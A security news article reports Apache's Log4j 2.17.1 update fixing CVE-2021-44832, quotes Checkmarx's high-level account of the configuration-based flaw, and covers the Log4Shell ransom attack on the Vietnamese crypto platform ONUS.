More than one security researcher predicted the Log4j/Log4Shell vulnerabilities discovered before Christmas won’t be the last.
They were right.
Apache has issued another security update for the logging library that administrators must now install in their applications. As of Tuesday the latest version of Log4j that should be in systems running Java 8 is 2.17.1.
That’s the fifth vulnerability revealed since December 9th.
There is no assurance this will be the last to be issued now that security researchers are giving increased scrutiny to the library.
The latest update closes what is officially called a remote code execution vulnerability, designated CVE-2021-44832, in version 2.17.0 .
Without this patch, an attacker with permission to modify a log4j logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the Java protocol.
Researchers at Checkmarx say they discovered and reported this latest bug, which is called a deserialization security vulnerability. This vulnerability doesn’t use the now-disabled lookup feature, they said in a blog. “The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the [log4j] configuration (like the ‘logback’ vulnerability CVE-2021-42550).”
Unlike logback, says Checkmarx, in log4j there is a feature to load a remote configuration file or to configure the logger through the code. As a result, arbitrary code execution could be achieved with a man-in-the-middle attack, with a user input ending up in a vulnerable configuration variable, or modifying the log4j config file.
Meanwhile the number of organizations hit while running vulnerable versions of log4j continues to climb. The Bleeping Computer news site reports that the Vietnamese cryptocurrency trading platform ONUS was recently attacked, with a threat actor demanding US$5 million or copied customer data would be published.
After the company’s refusal to pay the ransom, threat actors put up data of nearly 2 million ONUS customers for sale on forums, the report says.
According to the news report, sometime between December 11th and 13th — right after the December 9th warnings started going around the world — threat actors successfully exploited the Log4Shell vulnerability on an ONUS server running the Cyclos payment software.
While Cyclos had issued a patch on December 13th, for ONUS that wasn’t fast enough.
Infosec pros with systems running log4j have been advised even after patching to assume their applications have been compromised and should scan for signs of intrusion.
This is a link to the guidance from the cybersecurity agencies of Canada, the U.S., the U.K., Australia and New Zealand.